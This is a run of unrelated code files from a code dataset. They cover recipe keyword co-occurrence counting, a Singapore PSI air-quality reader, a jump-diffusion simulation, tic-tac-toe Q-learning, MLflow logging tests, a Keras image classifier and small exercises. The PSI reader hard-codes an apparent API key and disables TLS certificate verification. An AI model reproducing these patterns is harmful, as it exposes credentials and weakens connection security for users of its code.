help=u'出力ディレクトリ')\n parser.add_argument('-t', '--tags', help='使用するタグ(tag1,tag2,...)', type=str, default='F,T,D,Q,Ac,Af,Sf,St')\n params = parser.parse_args()\n\n return vars(params)\n\n\ndef read_synonym(synonym_path):\n synonyms = pd.read_csv(synonym_path, delimiter='\\t', header = None, encoding='utf-8')\n idx = list((synonyms.iloc[:, 0] != u'調理器具') & (synonyms.iloc[:, 0] != u'動作'))\n ontology = dict(zip(synonyms.iloc[idx, 2], synonyms.iloc[idx, 1]))\n return ontology\n\n\ndef parse_keywords(line, ontology, used_tags):\n keywords_by_step = []\n for token in line:\n token = token.split('/')\n if len(token) == 2:\n word = token[0]\n iob2_format = token[1].split('-')\n if len(iob2_format) == 2:\n recipe_tag = iob2_format[0]\n iob2_tag = iob2_format[1]\n if recipe_tag in used_tags:\n if iob2_tag == 'B':\n keywords_by_step.append(word)\n elif iob2_tag == 'I':\n keywords_by_step[-1] += word \n # ontologyに入っているもののみ\n keywords_by_step = [ontology[keyword] for keyword in keywords_by_step if keyword in ontology]\n keywords_by_step = list(set(keywords_by_step)) # 重複を除く\n return keywords_by_step\n\n\ndef extract_keywords(line, recipe_no, keywords, tmp_keywords, occur, ontology, used_tags):\n keywords_by_step = []\n line = line.split()\n if len(line) == 0: #レシピ終了\n for kwd in tmp_keywords:\n occur[keywords.index(kwd)] += 1\n tmp_keywords = []\n recipe_no += 1\n else:\n keywords_by_step = parse_keywords(line, ontology, used_tags)\n for kwd in keywords_by_step: # 重複を除く\n if kwd not in keywords: # 初めて登場したレシピ用語\n keywords.append(kwd)\n tmp_keywords.append(kwd)\n occur.append(0)\n elif kwd not in tmp_keywords: # レシピ中で初めて登場したレシピ用語\n tmp_keywords.append(kwd)\n return recipe_no, keywords, tmp_keywords, occur\n\n\ndef count_cooccurrence(line, recipe_no, keywords, tmp_keywords, cooccur, ontology, used_tags):\n keywords_by_step = []\n line = line.split()\n if len(line) == 0:\n for kwd1, kwd2 in itertools.combinations(tmp_keywords, 2):\n if kwd1 in keywords and kwd2 in keywords: \n idx1 
= keywords.index(kwd1)\n idx2 = keywords.index(kwd2)\n cooccur[idx1, idx2] += 1\n cooccur[idx2, idx1] += 1\n tmp_keywords = []\n recipe_no += 1\n else:\n keywords_by_step = parse_keywords(line, ontology, used_tags)\n for kwd in keywords_by_step:\n if kwd not in tmp_keywords:\n tmp_keywords.append(kwd) # レシピ中で初めて登場したレシピ用語\n return recipe_no, cooccur, tmp_keywords\n\n\ndef main(params):\n input_path = params['input_path']\n synonym_path = params['synonym_path']\n output_dir = params['output_dir']\n used_tags = params['tags']\n\n used_tags = used_tags.split(',')\n print(used_tags)\n\n tag_str = ''\n for t in used_tags:\n tag_str += t\n\n ontology = read_synonym(synonym_path)\n\n # レシピに出現するキーワードを全て取得\n output_file = os.path.join(output_dir, 'viob2_keywords_%s.pickle' % tag_str)\n if os.path.exists(output_file):\n with open(output_file, 'rb') as fin:\n keywords, occur, recipe_no = pickle.load(fin)\n else:\n keywords = []\n occur = []\n tmp_keywords = []\n recipe_no = 0\n with codecs.open(input_path, 'r', 'utf-8') as fin:\n for line in fin:\n line = line.strip()\n if recipe_no % 1000 == 0:\n print(\"extract keywords... %d \\r\"%recipe_no, end='') \n recipe_no, keywords, tmp_keywords, occur =\\\n extract_keywords(line, recipe_no, keywords, tmp_keywords, occur, ontology, used_tags)\n with open(output_file, 'wb') as fout:\n pickle.dump((keywords, occur, recipe_no), fout, protocol=0)\n\n\n # 行列を拡張していくのはコストが高いのでキーワード数を数えてから共起回数を数える\n i = 0\n tmp_keywords = []\n cooccur = np.zeros((len(keywords), len(keywords)))\n with codecs.open(input_path, 'r', 'utf-8') as fin:\n for line in fin:\n line = line.strip()\n if i % 1000 == 0:\n print(\"count co-occurrence... 
%d/%d \\r\"%(i, recipe_no), end='') \n i, cooccur, tmp_keywords =\\\n count_cooccurrence(line, i, keywords, tmp_keywords, cooccur, ontology, used_tags)\n\n print (\"keywords:%d \"%len(keywords))\n print (keywords[0:10])\n print (occur[0:10])\n print (\"cooccur \", cooccur.shape)\n print (cooccur[0:10, 0:10])\n\n with open(os.path.join(output_dir, 'viob2_cooccurence_%s.pickle' % tag_str), 'wb') as fout:\n pickle.dump((keywords, occur, cooccur, recipe_no), fout, protocol=0)\n\n\nif __name__ == '__main__':\n params = parse()\n main(params)\n\n","sub_path":"tools/grouping/python3/count_co-occurrence_viob2.py","file_name":"count_co-occurrence_viob2.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"600187710","text":"import requests\nfrom lxml import etree\nimport sys\nimport logging\nfrom texttospeech import TextToSpeech\n \n \nclass PSIReader:\n \n __apiURL = 'http://www.nea.gov.sg/api/WebAPI/?dataset=psi_update&keyref=781CF461BB6606ADEA01E0CAF8B35274602B7580279AFE8F'\n __proxies = {\"http\": 'http://host:port'}\n __xpathTemplate = \"/channel/item/region/id[text()='%s']/../record/reading[@type='NPSI']/@value\"\n \n \n def __init__(self):\n #print __name__\n global logger\n logger = logging.getLogger('PSIReader')\n hdlr = logging.FileHandler('myapp.log')\n formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s')\n hdlr.setFormatter(formatter)\n logger.addHandler(hdlr)\n logger.setLevel(logging.INFO)\n \n def getPSIUpdates(self):\n \n try:\n r = requests.get(PSIReader.__apiURL, \n verify=False)\n #print r.status_code\n #print r.headers\n xmlvalue = r.content\n r.close()\n return xmlvalue\n except:\n logger.error('Error', exc_info=True)\n \n @staticmethod \n def processXML(xmlvalue, regionCode, location):\n \n try:\n root = etree.fromstring(xmlvalue)\n val = root.xpath(PSIReader.__xpathTemplate % regionCode)\n psival = int(val[0])\n \n message = ''\n 
if psival >=0 and psival <=50:\n message = 'Good'\n elif psival >=51 and psival <=100:\n message = 'Moderate. You can do Normal activities. Stay Healthy'\n elif psival >=101 and psival <=200:\n message = 'Unhealthy. Take Mask. Drink Lot of Water and minimised outdoor activities'\n elif psival >=200 and psival <=300:\n message = 'Very unhealthy. Take Mask and Stay indoor. Drink Lot of Water'\n elif psival >=300:\n message = 'Hazardous. Take Mask and Stay indoor. Drink Lot of Water'\n else:\n return 'Looks like P S I value is not available from source'\n except:\n logger.error(\"Error: %s\" % sys.exc_info()[0], exc_info=True)\n return 'I am sorry, looks like P S I value is not available from source'\n \n return '%s P S I Value is %s and is %s' % (location, psival,message)\n\n def getPSIMessage(self, regionCode, location):\n xmlValue = self.getPSIUpdates()\n #print xmlValue\n text = self.processXML(xmlValue, regionCode, location)\n #print 'final message %s' % text\n return text\n \nif __name__==\"__main__\":\n \n psiReader = PSIReader()\n xmlValue = psiReader.getPSIUpdates()\n text = psiReader.processXML(xmlValue, 'rNO', 'Singapore North')\n tts = TextToSpeech()\n audioFile = 'psiblue.wav'\n tts.bluemixTTS(text, audioFile)\n #tts.googleTTS(\"I am done for the day google\", audioFile)\n tts.play(audioFile)\n #logger.info(xmlValue)\n print \n #print psiReader.processXML(xmlValue, 'rWE134', 'Singapore West')\n #print processXML(xmlvalue, 'rCE', 'Singapore Central')\n #print processXML(xmlvalue, 'rWE', 'Singapore West')\n #print processXML(xmlvalue, 'rEA', 'Singapore East')\n #print processXML(xmlvalue, 'rSO', 'Singapore South')\n","sub_path":"api/psireader.py","file_name":"psireader.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"581942394","text":"# Merton Jump Diffusion Model, 1976\n# Yves Hilpisch - Python for Finance p. 
285 ff.\n# Stochastic Differential Equation on page 285\n# Euler Discretization Scheme page 286\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass JumpDiffusion():\n \"\"\"\n SDE: \n dS_t = (r - r_j)S_t dt + sigma S_t dZ_t + J_t S_t dN_t\n where\n S_t index level at date t\n r constant riskless rhot rate\n r_j defined as lambda * (e^{mu_j + delta**2/2 - 1}) drift correctionf or jump tomaintain risk neutrality\n sigma constant volatility of S\n Z_t Standard Brownian motion\n J_t Jump at date ti with distribution:\n log(1+J_t) approx. N(log(1+mu_j) - delta**2/2, delta**2)\n where N is the cumulative distribution function fo a standard normal random variable\n \"\"\"\n def __init__(self):\n self.S0 = 100.0\n self.r = 0.05\n self.sigma = 0.2\n self.lamb = 0.75\n self.mu = -0.6\n self.delta = 0.25\n self.T = 1.0\n\n def _simulate(self):\n # We need three sets of independent random numbers in order to \n # simulate the jump diffusion\n # Input: tdat, r, startvalue, days, sigma)\n \n M = 10 # Maturity # Default: 50\n I = 1 # Number of Paths # Default: 10000\n dt = self.T/M\n rj = self.lamb * (np.exp(self.mu + 0.5 * self.delta**2) - 1)\n S = np.zeros((M+1, I))\n S[0] = self.S0\n sn1 = np.random.standard_normal((M+1, I))\n sn2 = np.random.standard_normal((M+1, I))\n poi = np.random.poisson(self.lamb * dt, (M+1, I))\n for t in range(1, M+1, 1):\n S[t] = S[t-1] * (np.exp((self.r - rj - 0.5 * self.sigma**2) * dt + self.sigma * np.sqrt(dt) * sn1[t]) + (np.exp(self.mu + self.delta * sn2[t]) - 1) * poi[t])\n S[t] = np.maximum(S[t], 0)\n return S\n\n def _run(self, plot = True):\n S = self._simulate()\n \n if plot:\n # Histogram\n plt.hist(S[-1], bins = 50)\n plt.xlabel('value')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.show()\n\n # Paths\n plt.plot(S[:, :10], lw = 1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.show()\n\nif __name__ == '__main__':\n jd = JumpDiffusion()\n 
jd._run()\n\n","sub_path":"BitcoinPricingKernels/src/jump_diffusion.py","file_name":"jump_diffusion.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"507129051","text":"from tictactoe_env import TicTacToe\nimport pdb \nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nimport random\n\ndef tabular_epsilon_greedy_policy(Q, eps, state):\n action = 0\n rand = random.uniform(0, 1)\n if rand <= eps :\n action = random.randrange(1, 9)\n else :\n action = np.argmax(Q[state])\n return action\n\nclass QLearning(object):\n def __init__(self, num_states, num_actions, alpha=0.5, gamma=0.9):\n self.Q = {}\n self.alpha = alpha\n self.gamma = gamma\n\n def update(self, state, action, reward, next_state, done):\n self.Q[state][action]+= self.alpha * (reward + (self.gamma * np.max(self.Q[next_state])) - self.Q[state][action])\n \ndef main():\n env = TicTacToe()\n done = False\n state = env.reset()\n epsilon_greedy_policy = QLearning(19683, 9) #3^9=19683\n num_episodes = 100\n eps = 0.005\n epsilon_greedy_rewards = []\n epsilon_greedy_start_qs = []\n saved_Q_table = []\n Qs = []\n Qdict=epsilon_greedy_policy.Q\n count=0\n for i in range(num_episodes):\n state = env.reset()\n done = False\n ep_rewards = 0\n list_states=[''.join(list(state.flatten().astype(str)))]\n list_actions=[]\n list_rewards=[]\n while done == False:\n currentstateval=''.join(list(state.flatten().astype(str)))\n if currentstateval not in Qdict.keys():\n Qdict[currentstateval]=np.zeros((9))\n action = tabular_epsilon_greedy_policy(epsilon_greedy_policy.Q, eps, currentstateval)\n #action = int(input(\"Choose where to place (1 to 9): \"))\n if state[int((action)/3)][(action)%3]==0: #to eliminate output of an action to a cell that is already occupied.\n next_state,reward,done = env.step(action+1)\n list_actions.append(action)\n list_rewards.append(reward)\n 
stateval=''.join(list(next_state.flatten().astype(str)))\n list_states.append(stateval)\n ep_rewards += reward\n if stateval not in Qdict.keys():\n Qdict[stateval]=np.zeros((9))\n state = next_state\n state = next_state\n epsilon_greedy_rewards.append(ep_rewards)\n for i in range(len(list_actions)) :\n action=list_actions[i]\n state=list_states[i]\n reward=list_rewards[i]\n next_state=list_states[i+1]\n epsilon_greedy_policy.update(state, action, reward,next_state,done)\n t = np.arange(0, num_episodes)\n plt.plot(t, epsilon_greedy_rewards)\n plt.xlabel('Episode Number')\n plt.ylabel('Starting State Q Value (Best Action)')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Self Learning/Model Training.py","file_name":"Model Training.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"613061410","text":"import inspect\nimport time\nimport pytest\nfrom unittest.mock import Mock, call\nfrom unittest import mock\n\n\nimport mlflow\nfrom mlflow.utils import gorilla\nfrom mlflow.tracking.client import MlflowClient\nfrom mlflow.utils.autologging_utils import (\n log_fn_args_as_params,\n wrap_patch,\n resolve_input_example_and_signature,\n batch_metrics_logger,\n BatchMetricsLogger,\n)\n\n# Example function signature we are testing on\n# def fn(arg1, default1=1, default2=2):\n# pass\n\n\ntwo_default_test_args = [\n ([\"arg1\", \"default1\"], {\"default2\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {}),\n ([\"arg1\", \"default1\", \"default2\"], {}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {}),\n ([\"arg1\"], {\"default1\": 42, \"default2\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {}),\n (\n [],\n {\"arg1\": 42, \"default1\": 42, \"default2\": 42},\n [\"arg1\", \"default1\", \"default2\"],\n [1, 2],\n {},\n ),\n ([\"user_arg\"], {\"default1\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default2\": 2}),\n 
([\"user_arg\"], {\"default2\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default1\": 1}),\n ([], {\"arg1\": 42, \"default1\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default2\": 2}),\n ([\"arg1\", \"default1\"], {}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default2\": 2}),\n ([\"arg1\"], {}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default1\": 1, \"default2\": 2}),\n ([], {\"arg1\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default1\": 1, \"default2\": 2}),\n]\n\n\n# Test function signature for the following tests\n# def fn_default_default(default1=1, default2=2, default3=3):\n# pass\n\n\nthree_default_test_args = [\n (\n [],\n {},\n [\"default1\", \"default2\", \"default3\"],\n [1, 2, 3],\n {\"default1\": 1, \"default2\": 2, \"default3\": 3},\n ),\n (\n [],\n {\"default2\": 42},\n [\"default1\", \"default2\", \"default3\"],\n [1, 2, 3],\n {\"default1\": 1, \"default3\": 3},\n ),\n]\n\n\n@pytest.fixture\ndef start_run():\n mlflow.start_run()\n yield\n mlflow.end_run()\n\n\ndef dummy_fn(arg1, arg2=\"value2\", arg3=\"value3\"): # pylint: disable=W0613\n pass\n\n\nlog_test_args = [\n ([], {\"arg1\": \"value_x\", \"arg2\": \"value_y\"}, [\"value_x\", \"value_y\", \"value3\"]),\n ([\"value_x\"], {\"arg2\": \"value_y\"}, [\"value_x\", \"value_y\", \"value3\"]),\n ([\"value_x\"], {\"arg3\": \"value_z\"}, [\"value_x\", \"value2\", \"value_z\"]),\n ([\"value_x\", \"value_y\"], {}, [\"value_x\", \"value_y\", \"value3\"]),\n ([\"value_x\", \"value_y\", \"value_z\"], {}, [\"value_x\", \"value_y\", \"value_z\"]),\n (\n [],\n {\"arg1\": \"value_x\", \"arg2\": \"value_y\", \"arg3\": \"value_z\"},\n [\"value_x\", \"value_y\", \"value_z\"],\n ),\n]\n\n\n@pytest.mark.large\n@pytest.mark.parametrize(\"args,kwargs,expected\", log_test_args)\ndef test_log_fn_args_as_params(args, kwargs, expected, start_run): # pylint: disable=W0613\n log_fn_args_as_params(dummy_fn, args, kwargs)\n client = mlflow.tracking.MlflowClient()\n 
params = client.get_run(mlflow.active_run().info.run_id).data.params\n for arg, value in zip([\"arg1\", \"arg2\", \"arg3\"], expected):\n assert arg in params\n assert params[arg] == value\n\n\n@pytest.mark.large\ndef test_log_fn_args_as_params_ignores_unwanted_parameters(start_run): # pylint: disable=W0613\n args, kwargs, unlogged = (\"arg1\", {\"arg2\": \"value\"}, [\"arg1\", \"arg2\", \"arg3\"])\n log_fn_args_as_params(dummy_fn, args, kwargs, unlogged)\n client = mlflow.tracking.MlflowClient()\n params = client.get_run(mlflow.active_run().info.run_id).data.params\n assert len(params.keys()) == 0\n\n\ndef get_func_attrs(f):\n assert callable(f)\n\n return (f.__name__, f.__doc__, f.__module__, inspect.signature(f))\n\n\n@pytest.mark.large\ndef test_wrap_patch_with_class():\n class Math:\n def add(self, a, b):\n \"\"\"add\"\"\"\n return a + b\n\n def new_add(self, *args, **kwargs):\n \"\"\"new add\"\"\"\n orig = gorilla.get_original_attribute(self, \"add\")\n return 2 * orig(*args, **kwargs)\n\n before = get_func_attrs(Math.add)\n wrap_patch(Math, Math.add.__name__, new_add)\n after = get_func_attrs(Math.add)\n\n assert after == before\n assert Math().add(1, 2) == 6\n\n\n@pytest.mark.large\ndef test_wrap_patch_with_module():\n def new_log_param(key, value):\n \"\"\"new mlflow.log_param\"\"\"\n return (key, value)\n\n before = get_func_attrs(mlflow.log_param)\n wrap_patch(mlflow, mlflow.log_param.__name__, new_log_param)\n after = get_func_attrs(mlflow.log_param)\n\n assert after == before\n assert mlflow.log_param(\"foo\", \"bar\") == (\"foo\", \"bar\")\n\n\n@pytest.fixture()\ndef logger():\n return Mock()\n\n\ndef get_input_example():\n return \"data\"\n\n\ndef infer_model_signature(_):\n return \"signature\"\n\n\ndef test_if_getting_input_example_fails(logger):\n error_msg = \"NoneType has no whatever\"\n\n def throws():\n raise Exception(error_msg)\n\n input_example, signature = resolve_input_example_and_signature(\n throws, infer_model_signature, True, True, 
logger\n )\n\n assert input_example is None\n assert signature is None\n calls = [\n call(\"Failed to gather input example: \" + error_msg),\n call(\n \"Failed to infer model signature: \"\n + \"could not sample data to infer model signature: \"\n + error_msg\n ),\n ]\n assert logger.warning.has_calls(calls)\n\n\ndef test_if_model_signature_inference_fails(logger):\n error_msg = \"stack overflow\"\n\n def throws(_):\n raise Exception(error_msg)\n\n input_example, signature = resolve_input_example_and_signature(\n get_input_example, throws, True, True, logger\n )\n\n assert input_example == \"data\"\n assert signature is None\n logger.warning.assert_called_with(\"Failed to infer model signature: \" + error_msg)\n\n\ndef test_happy_path_works(logger):\n input_example, signature = resolve_input_example_and_signature(\n get_input_example, infer_model_signature, True, True, logger\n )\n\n assert input_example == \"data\"\n assert signature == \"signature\"\n logger.warning.assert_not_called()\n\n\ndef test_avoids_collecting_input_example_if_not_needed(logger):\n # We create a get_input_example that modifies the value of x\n # If get_input_example was not invoked, x should not have been modified.\n\n x = {\"data\": 0}\n\n def modifies():\n x[\"data\"] = 1\n\n resolve_input_example_and_signature(modifies, infer_model_signature, False, False, logger)\n\n assert x[\"data\"] == 0\n logger.warning.assert_not_called()\n\n\ndef test_avoids_inferring_signature_if_not_needed(logger):\n # We create an infer_model_signature that modifies the value of x\n # If infer_model_signature was not invoked, x should not have been modified.\n\n x = {\"data\": 0}\n\n def modifies(_):\n x[\"data\"] = 1\n\n resolve_input_example_and_signature(get_input_example, modifies, True, False, logger)\n\n assert x[\"data\"] == 0\n logger.warning.assert_not_called()\n\n\ndef test_batch_metrics_logger_logs_all_metrics(start_run,): # pylint: disable=unused-argument\n run_id = 
mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n for i in range(100):\n metrics_logger.record_metrics({hex(i): i}, i)\n\n metrics_on_run = mlflow.tracking.MlflowClient().get_run(run_id).data.metrics\n\n for i in range(100):\n assert hex(i) in metrics_on_run\n assert metrics_on_run[hex(i)] == i\n\n\ndef test_batch_metrics_logger_flush_logs_to_mlflow(start_run): # pylint: disable=unused-argument\n run_id = mlflow.active_run().info.run_id\n\n # Need to patch _should_flush() to return False, so that we can manually flush the logger\n with mock.patch(\n \"mlflow.utils.autologging_utils.BatchMetricsLogger._should_flush\", return_value=False\n ):\n metrics_logger = BatchMetricsLogger(run_id)\n metrics_logger.record_metrics({\"my_metric\": 10}, 5)\n\n # Recorded metrics should not be logged to mlflow run before flushing BatchMetricsLogger\n metrics_on_run = mlflow.tracking.MlflowClient().get_run(run_id).data.metrics\n assert \"my_metric\" not in metrics_on_run\n\n metrics_logger.flush()\n\n # Recorded metric should be logged to mlflow run after flushing BatchMetricsLogger\n metrics_on_run = mlflow.tracking.MlflowClient().get_run(run_id).data.metrics\n assert \"my_metric\" in metrics_on_run\n assert metrics_on_run[\"my_metric\"] == 10\n\n\ndef test_batch_metrics_logger_runs_training_and_logging_in_correct_ratio(\n start_run,\n): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\") as log_batch_mock:\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n metrics_logger.record_metrics({\"x\": 1}, step=0) # data doesn't matter\n\n # first metrics should be logged immediately to record a previous timestamp and\n # batch log time\n log_batch_mock.assert_called_once()\n\n metrics_logger.total_log_batch_time = 1\n metrics_logger.total_training_time = 1\n\n log_batch_mock.reset_mock() # resets the 'calls' of this mock\n\n # the above 'training' took 1 second. 
So with target training-to-logging time ratio of\n # 10:1, 9 more 'training' should happen without sending the batch and then after the\n # 10th training the batch should be sent.\n for i in range(2, 11):\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n log_batch_mock.assert_not_called()\n metrics_logger.total_training_time = i\n\n # at this point, average log batch time is 1, and total training time is 9\n # thus the next record_metrics call should send the batch.\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n log_batch_mock.assert_called_once()\n\n # update log_batch time to reflect the 'mocked' training time\n metrics_logger.total_log_batch_time = 2\n\n log_batch_mock.reset_mock() # reset the recorded calls\n\n for i in range(12, 21):\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n log_batch_mock.assert_not_called()\n metrics_logger.total_training_time = i\n\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n log_batch_mock.assert_called_once()\n\n\ndef test_batch_metrics_logger_chunks_metrics_when_batch_logging(\n start_run,\n): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\") as log_batch_mock:\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n metrics_logger.record_metrics({hex(x): x for x in range(5000)}, step=0)\n run_id = mlflow.active_run().info.run_id\n\n for call_idx, call in enumerate(log_batch_mock.call_args_list):\n _, kwargs = call\n\n assert kwargs[\"run_id\"] == run_id\n assert len(kwargs[\"metrics\"]) == 1000\n for metric_idx, metric in enumerate(kwargs[\"metrics\"]):\n assert metric.key == hex(call_idx * 1000 + metric_idx)\n assert metric.value == call_idx * 1000 + metric_idx\n assert metric.step == 0\n\n\ndef test_batch_metrics_logger_records_time_correctly(start_run,): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\", wraps=lambda *args, **kwargs: time.sleep(1)):\n run_id = 
mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n\n assert metrics_logger.total_log_batch_time >= 1\n\n time.sleep(2)\n\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n\n assert metrics_logger.total_training_time >= 2\n\n\ndef test_batch_metrics_logger_logs_timestamps_as_int_milliseconds(\n start_run,\n): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\") as log_batch_mock, mock.patch(\n \"time.time\", return_value=123.45678901234567890\n ):\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n\n _, kwargs = log_batch_mock.call_args\n\n logged_metric = kwargs[\"metrics\"][0]\n\n assert logged_metric.timestamp == 123456\n\n\ndef test_batch_metrics_logger_continues_if_log_batch_fails(\n start_run,\n): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\") as log_batch_mock:\n log_batch_mock.side_effect = [Exception(\"asdf\"), None]\n\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n # this call should fail to record since log_batch raised exception\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n\n metrics_logger.record_metrics({\"y\": 2}, step=1)\n\n # even though the first call to log_batch failed, the BatchMetricsLogger should continue\n # logging subsequent batches\n last_call = log_batch_mock.call_args_list[-1]\n\n _, kwargs = last_call\n\n assert kwargs[\"run_id\"] == run_id\n assert len(kwargs[\"metrics\"]) == 1\n metric = kwargs[\"metrics\"][0]\n assert metric.key == \"y\"\n assert metric.value == 2\n assert metric.step == 
1\n","sub_path":"tests/utils/test_autologging_utils.py","file_name":"test_autologging_utils.py","file_ext":"py","file_size_in_byte":13521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"322687784","text":"# ----------------------------------------------------------\r\n# Introdução a Programação de Computadores - IPC\r\n# Universidade do Estado do Amazonas - UEA\r\n# Prof. Jucimar Jr\r\n# Hugo Thadeu Silva Cardoso 1715310013\r\n# Luiz Paulo Machado 1515200542\r\n# Ian Gabriel Costa Machado 1215120276\r\n# André Luis Laborda Neves 1515070006\r\n# Gabriel de Queiroz Souza 1715310044\r\n# João Vitor De Cordeiro B Gonçalves 1515140036\r\n# Rodrigo Duarte de Souza 1115140049\r\n\r\n# --------------------------\r\n\r\n\r\n#ENTRADA DOS DADOS#####\r\nhoras = int(input(' Digite a hora: '))\r\nminutos = int(input(' Digite os minutos: '))\r\n\r\n#PROCESSAMENTO######\r\n\r\n# LETRA A #\r\nhmin = horas * 60\r\nprint('Conversão de horas para minutos =', hmin)\r\n\r\n#LETRA B#\r\ntminutos = hmin + minutos\r\nprint('Total em minutos =', tminutos)\r\n\r\n#LETRA C#\r\nsegundos = tminutos * 60\r\nprint('Horas em segundos =', segundos)\r\n\r\n\r\n","sub_path":"lista1.5/lista1.5_questao25.py","file_name":"lista1.5_questao25.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"559930729","text":"#!/usr/bin/python3\n# hello_tkinter.py by Barron Stone\n# This is an exercise file from Python GUI Devlopment with Tkinter on lynda.com\n\n#python 2 uses Tkinter\nfrom tkinter import *\n\nroot = Tk()\nLabel (root, text = \"HELLO PANDA!\").pack()\nroot.mainloop()\n\n","sub_path":"Python/Lynda Videos/Python GUI Development with Tkinter/Chapter 01/05_hello_tkinter.py","file_name":"05_hello_tkinter.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"363911469","text":"''' To be run in the main computer. It compiles the model and saves it as an .h5 file\n'''\n\nfrom keras import backend as K\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Activation, Dropout, Flatten, Dense, Conv2D, MaxPooling2D\nimport numpy as np\nfrom keras.utils import plot_model\nimport pydot\n\n# Dimensions of our images.\nimg_width, img_height = 150, 150\ntrain_data_dir = 'training_data'\nvalidation_data_dir = 'testing_data'\nnb_train_samples = 500\nnb_validation_samples = 200\nepochs = 25\nbatch_size = 32\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n# This is the augmentation configuration we will use for training\ntrain_datagen = ImageDataGenerator(\n rescale = 1. / 255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\n# This is the augmentation configuration we will use for testing: only rescaling\ntest_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size = (img_width, img_height),\n batch_size = batch_size,\n class_mode = 'binary')\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size = (img_width, img_height),\n batch_size = batch_size,\n class_mode = 'binary')\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch = nb_train_samples // batch_size,\n epochs = epochs,\n validation_data = validation_generator,\n validation_steps = nb_validation_samples // batch_size)\n\nmodel.save('not-laptop-on-mac-25.h5')\nplot_model(model, to_file='model.png')\n","sub_path":"Assignment_2_Deep_Learning/streaming_classifier/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"182246906","text":"#!/usr/bin/python3\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nfilename1 = \"out-warmup/128kb-1ke-32th.json\" \nfilename2 = \"out-warmup/128kb-1ke-128th.json\"\nfilename3 = \"out-warmup/128kb-1ke-256th.json\"\nfilename4 = \"out-warmup/128kb-1ke-512th.json\"\nfilename5 = \"out-warmup/128kb-1ke-1024th.json\"\n\nwith open(filename1) as f1:\n data1 = json.load(f1)\nwith open(filename2) as f2:\n data2 = 